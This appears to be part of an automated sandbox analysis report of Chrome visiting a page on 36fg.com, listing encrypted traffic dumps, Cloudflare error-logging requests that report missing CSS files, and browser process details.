                                                        2025-03-15 00:18:00 UTC1369INData Raw: 98 1c e9 57 f3 32 fb 75 e8 d9 2b 6c 16 46 67 65 1a bf 41 77 65 48 0e 47 c4 26 79 2f 20 04 88 bc 15 e8 68 8e 09 62 16 5b 4e d1 ab 94 ba 7a 75 a1 32 91 29 23 a5 dd 1b 05 3e 3d de 13 61 8f b5 90 c8 0e 89 d8 25 c1 e7 07 f4 ee 14 9d 97 17 49 83 22 ca 25 52 05 c2 fc 5c a8 82 72 5f 2b 45 e0 49 f6 27 ba 2e 4d db a4 d4 43 ad ea 06 ce f7 9f 4a 2c 73 af b9 0f e4 0b 91 39 6b 4a a1 94 67 c9 18 a0 a6 c9 bd ed d0 d7 38 9f 07 53 06 db 1a 63 ee 48 77 b1 14 63 ad bd 5e 09 7e 5b 4f d1 1f 77 14 52 41 b6 da b7 64 ce 99 02 c7 b0 43 e0 99 6a 40 6a 0a 27 2b ef 33 88 e9 c8 df 52 41 f6 0a c4 34 f4 a9 2b a8 6a 39 ce d5 5c d1 be f7 05 09 4e 3f 4b b1 43 cb 73 9d 8b a9 06 f0 1f 75 7d 57 0d 42 df 77 c9 bf a0 4e 9e bf 4a eb 9b de 85 02 2d f6 64 22 27 82 86 ab 04 dc 48 48 02 db 4b aa de
                                                        Data Ascii: W2u+lFgeAweHG&y/ hb[Nzu2)#>=a%I"%R\r_+EI'.MCJ,s9kJg8ScHwc^~[OwRAdCj@j'+3RA4+j9\N?KCsu}WBwNJ-d"'HHK
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 1a df bd ff 75 ae f8 65 91 45 d4 b6 d0 8e 03 14 a4 74 02 d3 33 c5 24 f5 36 b3 01 ae 2d 46 3b b0 8f 26 72 17 3e 22 f8 fb 4c b1 b0 79 cb be 1b f2 53 03 8c 5c 1c 3f c9 7e 90 e0 b5 4d fe 3e 50 a4 68 92 67 38 20 50 ee f6 8d 12 26 b7 aa c6 1a 65 6f b8 8e 38 40 b9 1e f0 2c 2b 8e 89 60 d7 f5 8c e7 b1 9d 5b 07 c0 85 1e d5 3e 2b 21 a0 fc c9 ea bb af 06 97 33 9c 96 d0 59 89 f3 69 37 54 a3 a1 a2 81 10 a3 a1 e5 39 fa 77 cc 1c 8b 53 d9 84 e4 70 2c 8a 3d 23 16 f3 4e c2 52 c1 ca dd c4 5a 7e 9f 68 a8 e7 12 3c 3f e4 a3 5b 9a 95 f2 ff db 71 c2 83 0b ea c2 bd 7a 94 8e 51 9c df 55 2c 3c 2b 6f 82 02 82 98 f6 4b 5a 85 e4 21 32 4f 0a 47 a8 d6 7c 29 48 7e e1 63 4f 20 a6 69 82 4f a1 e4 fa c1 64 89 ce 4a e6 05 a9 98 0d e4 a5 2e a0 e9 ce a9 d2 eb e7 6c 2f 9d d0 47 91 17 cb 7a 36 54
                                                        Data Ascii: ueEt3$6-F;&r>"LyS\?~M>Phg8 P&eo8@,+`[>+!3Yi7T9wSp,=#NRZ~h<?[qzQU,<+oKZ!2OG|)H~cO iOdJ.l/Gz6T
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 59 aa 2b 52 c3 d5 e9 4e d0 ea df 41 ea 3b 2a 9e fb 9c 7b 8d 22 97 58 9a 98 a7 d9 d2 84 94 53 11 a0 ff 98 6b 85 7e d2 e7 30 b5 cf 66 b6 3f 49 f1 0d 9e 2b fe 90 e4 ef 83 ae 12 ef 71 ff 84 af 8d a6 64 ee 46 12 4f f1 e4 15 ac 74 df 2e ac 38 4d 1e d1 6c cc 38 d3 4f 28 56 77 8e 4a 66 d5 5d 83 17 4e 9a b8 21 d6 4f f9 cd 21 d9 e8 12 7b 56 b7 fd 42 a0 46 51 98 54 0d aa 68 19 b2 43 b2 d9 06 3e 5f 01 97 0b 58 d7 d0 1d d0 14 ce 7d 8b 9b ac 4c da 55 2c 30 af 34 f2 a8 38 58 6c 9f 04 76 89 d7 17 0a c9 58 de 9a 65 6b 06 35 60 48 0b ff 31 74 de a2 13 b8 85 b0 05 27 30 81 b3 9e aa aa 44 4a 1f 53 ec a2 1d 47 e3 ed 87 74 dc 36 5e 4e bf 99 14 0a 12 11 e9 10 2c af 6e e0 68 b8 65 70 eb 4a a1 db c3 69 00 2f f8 e4 3b d6 ad 55 fa 24 f0 20 2e 78 e6 15 bb 04 e9 6e f6 16 be fe 46 75
                                                        Data Ascii: Y+RNA;*{"XSk~0f?I+qdFOt.8Ml8O(VwJf]N!O!{VBFQThC>_X}LU,048XlvXek5`H1t'0DJSGt6^N,nhepJi/;U$ .xnFu
                                                        2025-03-15 00:18:00 UTC1369INData Raw: e5 15 d6 b0 23 8e a6 40 25 de 07 c3 ad 3b 86 b3 60 74 82 a0 81 fb 13 0d a3 61 3a 17 9b 08 7a 19 30 d0 f6 be ae 43 9a 12 22 75 a2 a1 fb a6 00 c9 79 33 f1 d2 01 41 c7 4a 81 ee 5b 2e d0 ba 76 2d e0 a2 8a 6a dc b2 5c 71 e6 6e 74 07 2c 64 2b de 74 02 38 a0 38 09 cf 80 75 8a 51 e1 42 cf 80 f8 d2 15 66 e2 c4 af 00 0f 25 66 3d 92 c7 dc 5c a3 10 95 bf 97 a4 58 6a f8 81 13 94 7c f2 1f 15 7d ce 71 7e f2 bf 3b c7 7a 87 ce 3c b5 57 c8 dc 5a 01 13 15 1c d2 fb 55 ad 2e 9a 6f ff 18 50 29 00 c7 33 20 7f b1 e7 1d a4 cc 33 e0 9f ed 4d 2c bc e0 df fe 5c f0 ca a8 84 29 25 49 bf 45 1e 30 f0 a5 1a d5 3d 04 a7 ee 24 93 c3 78 42 d7 af 01 17 5a 3e 2f e7 e6 90 13 23 98 75 73 63 f5 45 a7 08 71 c4 75 03 36 14 b3 fe 80 cc 36 31 31 cb a9 c3 47 73 8e 45 48 ee 51 92 64 66 1d 28 a9 25 db
                                                        Data Ascii: #@%;`ta:z0C"uy3AJ[.v-j\qnt,d+t88uQBf%f=\Xj|}q~;z<WZU.oP)3 3M,\)%IE0=$xBZ>/#uscEqu6611GsEHQdf(%


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.54979435.190.80.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:18:00 UTC508OUTPOST /report/v4?s=X%2BbRbpd7JxMWsntsFcS1LepKvvWpTsZjxDUJ18nxEiwYfGqTQR0RVxV0a9b5fKBA5sLo%2BUCv0HwiJuridq6o6k2g7rYXlXISKHSiDgUhAB0xe2VbLySW2d3Gx6PTmmQ%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 464
                                                        Content-Type: application/reports+json
                                                        Origin: https://www.36fg.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-15 00:18:00 UTC464OUTData Raw: 5b 7b 22 61 67 65 22 3a 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 36 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 33 36 66 67 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 34 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72
                                                        Data Ascii: [{"age":6,"body":{"elapsed_time":2169,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://www.36fg.com/static/css/style.css","sampling_fraction":1.0,"server_ip":"104.21.64.1","status_code":404,"type":"http.error"},"type":"networ
                                                        2025-03-15 00:18:01 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Sat, 15 Mar 2025 00:18:00 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.54980435.190.80.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:19:00 UTC539OUTOPTIONS /report/v4?s=sn%2BuihXpHrCKNPPhFfmwkmlKkZYlmLmSjmYzlcU%2FHQlMlVDaiQxjD0%2Ftu79X89u%2F5E2wBrolgpPaNIPIX2uuCpO%2FX5qOrnzap1cPg6kzDet9nm8KynMJ30oeeTTYkhY%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-15 00:19:00 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Sat, 15 Mar 2025 00:19:00 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.54980535.190.80.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:19:00 UTC514OUTPOST /report/v4?s=sn%2BuihXpHrCKNPPhFfmwkmlKkZYlmLmSjmYzlcU%2FHQlMlVDaiQxjD0%2Ftu79X89u%2F5E2wBrolgpPaNIPIX2uuCpO%2FX5qOrnzap1cPg6kzDet9nm8KynMJ30oeeTTYkhY%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 892
                                                        Content-Type: application/reports+json
                                                        Origin: https://www.36fg.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-15 00:19:00 UTC892OUTData Raw: 5b 7b 22 61 67 65 22 3a 36 30 30 30 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 37 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 33 36 66 67 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 63 73 73 2f 73 63 72 6f 6c 6c 74 6f 70 2e 63 73 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 34 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22
                                                        Data Ascii: [{"age":60002,"body":{"elapsed_time":2173,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://www.36fg.com/static/css/scrolltop.css","sampling_fraction":1.0,"server_ip":"104.21.64.1","status_code":404,"type":"http.error"},"type"
                                                        2025-03-15 00:19:01 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Sat, 15 Mar 2025 00:19:00 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        020406080s020406080100

                                                        Click to jump to process

                                                        020406080s0.0050100MB

                                                        Click to jump to process

                                                        Target ID:3
                                                        Start time:20:17:40
                                                        Start date:14/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff75fe80000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:20:17:45
                                                        Start date:14/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3
                                                        Imagebase:0x7ff75fe80000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:20:17:48
                                                        Start date:14/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3220 /prefetch:8
                                                        Imagebase:0x7ff75fe80000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:20:17:51
                                                        Start date:14/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.36fg.com/tp-Related/18104.html"
                                                        Imagebase:0x7ff75fe80000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        No disassembly